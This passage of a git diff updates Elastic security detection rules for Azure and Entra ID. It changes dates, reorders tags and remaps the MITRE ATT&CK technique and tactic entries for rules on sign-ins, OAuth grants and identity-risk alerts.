[[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -105,20 +109,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml index 09ce8630b50..eb88bf1eec5 100644 --- a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml +++ b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = ["https://docs.microsoft.com/en-us/azure/governance/policy/samples/ risk_score = 21 rule_id = "141e9b3a-ff37-4756-989d-05d7cbf35b0e" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,26 +78,18 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite externa [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml index 61dc6a1a52f..9db32da37e9 100644 --- a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["azure"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,18 +79,7 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs To use this rule, ensure that Microsoft Entra ID Sign-In Logs are being collected and streamed into the Elastic Stack via the Azure integration. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-In Logs", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -108,40 +97,34 @@ event.dataset: "azure.signinlogs" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.service_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml index 6ff9e5edd71..de672c91aaf 100644 --- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/14" integration = ["azure"] maturity = "production" -updated_date = "2026/02/26" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Matteo Potito Giorgio"] @@ -107,30 +107,31 @@ event.dataset:(azure.activitylogs or azure.signinlogs) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml index 67c5edccbc2..7d8818d01ac 100644 --- a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml +++ b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/08" integration = ["azure"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -72,21 +72,7 @@ setup = """#### Required Microsoft Entra ID Sign-In and Graph Activity Logs This rule requires the Microsoft Entra ID Sign-In Logs and Microsoft Graph Activity Logs integration to be enabled and configured to collect audit and activity logs via Azure Event Hub. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Domain: API", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-In Logs", - "Data Source: Microsoft Graph", - "Data Source: Microsoft Graph Activity Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Defense Evasion", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Domain: Identity", "Domain: API", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -190,36 +176,23 @@ from logs-azure.signinlogs-*, logs-azure.graphactivitylogs-* metadata _id, _vers [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml index fd3737f9131..f7d9735ba39 100644 --- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,16 +65,7 @@ references = [ risk_score = 47 rule_id = "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Credential Access", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -91,34 +82,34 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml index 84bf8f56d93..349868f15fa 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/17" integration = ["azure"] maturity = "production" -updated_date = "2026/01/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -139,44 +139,34 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml index d8d3ad94d2c..102f666f4aa 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/01/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,15 +66,7 @@ references = [ risk_score = 47 rule_id = "14fa0285-fe78-4843-ac8e-f4b481f49da9" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -139,41 +131,31 @@ event.outcome: "success" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml index f21da0d5140..b650e686492 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/03" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -131,44 +131,21 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[[rule.threat.technique]] -id = "T1656" -name = "Impersonation" -reference = "https://attack.mitre.org/techniques/T1656/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name", "azure.signinlogs.properties.app_id"] diff --git a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml index 470aa856ca8..eb4ef151eb7 100644 --- a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml +++ b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,36 +90,18 @@ event.dataset:azure.signinlogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml index 9d467e9edc0..38af402e39f 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/29" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,17 +78,7 @@ To use this rule, ensure that Microsoft Entra ID Protection logs are being colle For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Use Case: Risk Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Use Case: Risk Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -122,40 +112,17 @@ value = "low" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - - - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" @@ -163,17 +130,21 @@ reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml index e70380965a8..d22b4a05914 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml @@ -3,7 +3,7 @@ creation_date = "2025/06/02" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,58 +119,21 @@ value = "low" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - - - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml index da8c29614c4..23eb23df53f 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,17 +66,7 @@ references = ["https://securityscorecard.com/wp-content/uploads/2025/02/MassiveB risk_score = 47 rule_id = "c766bc56-fdca-11ef-b194-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -123,34 +113,39 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml index 6ec4110788e..d8c10af6a3e 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,52 +94,21 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml index a80ea2d7227..7ec92bf9f21 100644 --- a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml +++ b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,17 +74,7 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration. """ severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Resources: Investigation 